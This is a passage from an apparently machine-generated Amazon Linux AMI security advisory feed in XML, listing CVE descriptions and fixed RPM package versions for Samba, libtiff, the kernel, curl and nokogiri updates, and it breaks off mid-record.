</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17049" title="" id="CVE-2020-17049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32742" title="" id="CVE-2022-32742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32744" title="" id="CVE-2022-32744" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32745" title="" id="CVE-2022-32745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32746" title="" id="CVE-2022-32746" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsmbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="20.62.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-20.62.amzn1.noarch.rpm</filename></package><package name="ctdb" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="20.62.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-20.62.amzn1.noarch.rpm</filename></package><package name="samba-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-20.62.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-20.62.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="20.62.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-20.62.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1644</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1644: important priority package update for libtiff</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3970:
A vulnerability was found in LibTIFF. It has been classified as critical. This affects the function TIFFReadRGBATileExt of the file libtiff/tif_getimage.c. The manipulation leads to integer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 227500897dfb07fb7d27f7aa570050e62617e3be. It is recommended to apply a patch to fix this issue. The identifier VDB-213549 was assigned to this vulnerability.
CVE-2022-1355:
A stack buffer overflow flaw was found in Libtiffs' tiffcp.c in main() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffcp tool, triggering a stack buffer overflow issue, possibly corrupting the memory, and causing a crash that leads to a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1355" title="" id="CVE-2022-1355" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3970" title="" id="CVE-2022-3970" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.42.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.42.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.42.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.42.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.42.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1645</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1645: important priority package update for kernel</title><issued date="2022-12-01 17:33:00" /><updated date="2024-07-03 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48651:
In the Linux kernel, the following vulnerability has been resolved: ipvlan: Fix out-of-bound bugs caused by unset skb->mac_header If an AF_PACKET socket is used to send packets through ipvlan and the default xmit function of the AF_PACKET socket is changed from dev_queue_xmit() to packet_direct_xmit() via setsockopt() with the option name of PACKET_QDISC_BYPASS, the skb->mac_header may not be reset and remains as the initial value of 65535, this may trigger slab-out-of-bounds bugs as following:
CVE-2022-43750:
drivers/usb/mon/mon_bin.c in usbmon in the Linux kernel before 5.19.15 and 6.x before 6.0.1 allows a user-space client to corrupt the monitor's internal memory.
CVE-2022-41850:
roccat_report_event in drivers/hid/hid-roccat.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free in certain situations where a report is received while copying a report->value is in progress.
CVE-2022-41849:
drivers/video/fbdev/smscufx.c in the Linux kernel through 5.19.12 has a race condition and resultant use-after-free if a physically proximate attacker removes a USB device while calling open(), aka a race condition between ufx_ops_open and ufx_usb_disconnect.
CVE-2022-40768:
drivers/scsi/stex.c in the Linux kernel through 5.19.9 allows local users to obtain sensitive information from kernel memory because stex_queuecommand_lck lacks a memset for the PASSTHRU_CMD case.
CVE-2022-39842:
An issue was discovered in the Linux kernel before 5.19. In pxa3xx_gcu_write in drivers/video/fbdev/pxa3xx-gcu.c, the count parameter has a type conflict of size_t versus int, causing an integer overflow and bypassing the size check. After that, because it is used as the third argument to copy_from_user(), a heap overflow may occur.
CVE-2022-3649:
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_new_inode of the file fs/nilfs2/inode.c of the component BPF. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211992.
CVE-2022-3646:
A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function nilfs_attach_log_writer of the file fs/nilfs2/segment.c of the component BPF. The manipulation leads to memory leak. The attack may be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211961 was assigned to this vulnerability.
CVE-2022-3621:
A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function nilfs_bmap_lookup_at_level of the file fs/nilfs2/inode.c of the component nilfs2. The manipulation leads to null pointer dereference. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211920.
CVE-2022-3594:
A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function intr_callback of the file drivers/net/usb/r8152.c of the component BPF. The manipulation leads to logging of excessive data. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211363.
CVE-2022-3565:
A vulnerability, which was classified as critical, has been found in Linux Kernel. Affected by this issue is the function del_timer of the file drivers/isdn/mISDN/l1oip_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211088.
CVE-2022-3564:
A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087.
CVE-2022-3542:
A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function bnx2x_tpa_stop of the file drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211042 is the identifier assigned to this vulnerability.
CVE-2022-2978:
A flaw use after free in the Linux kernel NILFS file system was found in the way user triggers function security_inode_alloc to fail with following call to function nilfs_mdt_destroy. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.
CVE-2022-26373:
Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.
CVE-2022-20369:
In v4l2_m2m_querybuf of v4l2-mem2mem.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-223375145References: Upstream kernel
CVE-2021-47103:
In the Linux kernel, the following vulnerability has been resolved:
inet: fully convert sk->sk_rx_dst to RCU rules
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47103" title="" id="CVE-2021-47103" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20369" title="" id="CVE-2022-20369" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26373" title="" id="CVE-2022-26373" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2978" title="" id="CVE-2022-2978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3542" title="" id="CVE-2022-3542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3564" title="" id="CVE-2022-3564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3565" title="" id="CVE-2022-3565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3594" title="" id="CVE-2022-3594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3621" title="" id="CVE-2022-3621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3646" title="" id="CVE-2022-3646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3649" title="" id="CVE-2022-3649" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39842" title="" id="CVE-2022-39842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40768" title="" id="CVE-2022-40768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41849" title="" id="CVE-2022-41849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41850" title="" id="CVE-2022-41850" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43750" title="" id="CVE-2022-43750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48651" title="" id="CVE-2022-48651" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.299-152.520.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.299-152.520.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.299" release="152.520.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.299-152.520.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1646</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1646: medium priority package update for curl</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-35252:
A vulnerability found in curl. This security flaw happens when curl is used to retrieve and parse cookies from an HTTP(S) server, where it accepts cookies using control codes (byte values below 32), and also when cookies that contain such control codes are later sent back to an HTTP(S) server, possibly causing the server to return a 400 response. This issue effectively allows a "sister site" to deny service to siblings and cause a denial of service attack.
CVE-2022-32208:
A vulnerability was found in curl. This issue occurs because it mishandles message verification failures when curl does FTP transfers secured by krb5. This flaw makes it possible for a Man-in-the-middle attack to go unnoticed and allows data injection into the client.
CVE-2022-32206:
A vulnerability was found in curl. This issue occurs because the number of acceptable "links" in the "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps. This flaw leads to a denial of service, either by mistake or by a malicious actor.
CVE-2022-27782:
A vulnerability was found in curl. This issue occurs because curl can reuse a previously created connection even when a TLS or SSH-related option is changed that should have prohibited reuse. This flaw leads to an authentication bypass, either by mistake or by a malicious actor.
CVE-2022-27781:
A vulnerability was found in curl. This issue occurs due to an erroneous function. A malicious server could make curl within Network Security Services (NSS) get stuck in a never-ending busy loop when trying to retrieve that information. This flaw allows an Infinite Loop, affecting system availability.
CVE-2022-27776:
A vulnerability was found in curl. This security flaw allows leak authentication or cookie header data on HTTP redirects to the same host but another port number. Sending the same set of headers to a server on a different port number is a problem for applications that pass on custom `Authorization:` or `Cookie:`headers. Those headers often contain privacy-sensitive information or data.
CVE-2022-27774:
A vulnerability was found in curl. This security flaw allows leaking credentials to other servers when it follows redirects from auth-protected HTTP(S) URLs to other protocols and port numbers.
CVE-2022-22576:
A vulnerability was found in curl. This security flaw allows reusing OAUTH2-authenticated connections without properly ensuring that the connection was authenticated with the same credentials set for this transfer. This issue leads to an authentication bypass, either by mistake or by a malicious actor.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22576" title="" id="CVE-2022-22576" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27774" title="" id="CVE-2022-27774" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27776" title="" id="CVE-2022-27776" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27781" title="" id="CVE-2022-27781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27782" title="" id="CVE-2022-27782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32206" title="" id="CVE-2022-32206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32208" title="" id="CVE-2022-32208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35252" title="" id="CVE-2022-35252" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.101.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.101.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.101.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.101.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.101.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.101.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.101.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1647</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1647: important priority package update for libtiff</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-2867:
A flaw was found in libtiffs tiffcrop utility that has a uint32_t underflow that can lead to an out-of-bounds read and write. This flaw allows an attacker who supplies a crafted file to tiffcrop to cause a crash or, in some cases, further exploitation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2867" title="" id="CVE-2022-2867" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.40.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.40.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.40.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.40.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.40.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1648</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1648: important priority package update for rubygem-nokogiri</title><issued date="2022-12-01 17:33:00" /><updated date="2022-12-10 00:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-29181:
A flaw was found in the rubygem-nokogiri package. This flaw allows malicious users to change partial contents or configurations on the system. Additionally, this vulnerability can also cause a limited denial of service in the form of interruptions in resource availability.
